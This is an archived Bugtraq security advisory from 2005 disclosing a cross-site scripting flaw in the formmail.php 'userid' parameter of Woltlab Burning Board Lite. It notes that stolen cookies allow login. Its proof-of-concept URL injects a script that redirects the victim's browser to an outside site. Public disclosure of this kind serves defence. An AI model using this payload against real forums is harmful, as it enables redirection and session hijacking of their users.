Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Security Advisory: Woltlab Burning Board Lite formmail.php XSS

From: Martin Heistermann <martin.heistermann () web de>
Date: 8 Jan 2005 19:29:57 -0000


Advisory Information
--------------------
Advisory name           :  Woltlab Burning Board Lite formmail.php XSS
Discovered by           :  drhankey / it-security23.net
Vendor Name             :  Woltlab
Vendor Homepage         :  http://www.woltlab.de
Software                :  Woltlab Burning Board Lite
Vulnerability Type      :  Cross-Site-Scripting
Vulnerable Versions     :  1.0.0, 1.0.1e, maybe more
Platforms               :  OS Independent, PHP


What is Woltlab Burning Board Lite?
----------------------------------
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,
a PHP based bulletin board


Vulnerability Description:
-------------------------
formmail.php outputs the "userid"-parameter unfiltered, so its possible to add arbitary Code to the output by using a 
malformed link.
The Board also allows logging in with stolen cookies.

Proof of Concept:
-----------------
http://website/board/formmail.php?userid=1";>&lt;script&gt;document.location.href="http://www.it-security23.net";;</script
 x="y
Previous By Date Next
Previous By Thread Next

Current thread: